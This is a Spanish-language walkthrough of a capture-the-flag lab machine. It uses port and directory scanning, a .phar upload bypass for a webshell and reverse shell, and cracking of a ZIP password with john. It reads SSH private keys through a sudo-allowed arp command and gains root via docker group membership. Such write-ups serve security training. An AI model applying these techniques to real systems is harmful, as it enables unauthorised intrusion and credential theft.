Enumeramos puertos y directorios:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.108❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 12:49 -03
Nmap scan report for 192.168.1.108
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e1:85:8b:7b:6d:a2:6b:1a:ed:18:8e:08:a0:90:87:2a (ECDSA)
|_ 256 ad:fe:77:78:a0:57:70:cc:33:68:b5:84:26:a3:b3:63 (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Essex
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds❯ gobuster dir -u 'http://192.168.1.108' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh,db -r
...
/index.html (Status: 200) [Size: 2447]
/index.php (Status: 200) [Size: 72614]
/backup (Status: 200) [Size: 421]
/imagenes (Status: 200) [Size: 1452]
...
❯ gobuster dir -u 'http://192.168.1.108/backup' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh,db -r
...
/index.html (Status: 200) [Size: 421]
/upload.php (Status: 200) [Size: 17]
/empty (Status: 200) [Size: 1]
...En /backup hay un formulario de subida. La subida directa de .php falla, pero tras probar extensiones tenemos éxito con .phar. Los archivos se alojan en /backup/empty, así que accedemos a nuestra webshell para obtener una reverse shell como www-data:
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.108:44774.
bash: cannot set terminal process group (480): Inappropriate ioctl for device
bash: no job control in this shell
www-data@arpon:/var/www/html/backup/empty$Listando con ls -la descubrimos un directorio oculto con un ZIP protegido por contraseña, que descargamos y crackeamos con john:
www-data@arpon:/var/www/html/backup/empty$ ls -la
...
drwxr-xr-x 2 www-data www-data 4096 May 13 2024 .hidden
...❯ zip2john zip_files/backup_id.zip > zip_hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt zip_hash
...
swordfish (backup_id.zip)
...El ZIP contiene la clave id_rsa del usuario calabrote, con la que nos conectamos:
❯ ssh calabrote@192.168.1.108 -i id_rsa_calabrote
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 13 17:58:26 2025 from 192.168.1.7
$Para escalar privilegios, revisamos los permisos sudo:
calabrote@arpon:/tmp$ sudo -l
Matching Defaults entries for calabrote on arpon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User calabrote may run the following commands on arpon:
(root) NOPASSWD: /usr/sbin/arpPodemos ejecutar arp como root, que con -f lee archivos. Lo usamos como lector arbitrario sobre el .bash_history de foque para descubrir un script de backup:
calabrote@arpon:/tmp$ sudo arp -v -f /home/foque/.bash_history
...
>> cat script_net_backup.sh
>> chmod 755 script_net_backup.sh
...
calabrote@arpon:/tmp$ sudo arp -v -f /home/foque/script_net_backup.sh
>> #!/bin/sh
>> cd /var/www/html
>> tar czf /tmp/backup.tar.gz
>> scp -i /home/foque/.ssh/id_rsa_foque_script /tmp/backup.tar.gz 10.1.1.1@foque:backups/
>> rm /tmp/backup.tar.gzEl script usa la clave id_rsa_foque_script, que también leemos con arp:
calabrote@arpon:/tmp$ sudo arp -v -f /home/foque/.ssh/id_rsa_foque_script
>> -----BEGIN OPENSSH PRIVATE KEY-----
...
>> -----END OPENSSH PRIVATE KEY-----Tras formatear la clave, nos conectamos como foque y obtenemos la primera flag:
❯ ssh foque@192.168.1.108 -i id_rsa_foque
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 13 09:50:04 2024 from 192.168.1.2
$Revisamos los grupos de foque:
foque@arpon:~$ id
uid=1002(foque) gid=1002(foque) grupos=1002(foque),996(docker)Pertenece al grupo docker (Privileged Groups Privesc), que permite montar el sistema de archivos del host en un contenedor y obtener root:
foque@arpon:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
rootObtenemos la flag y fin.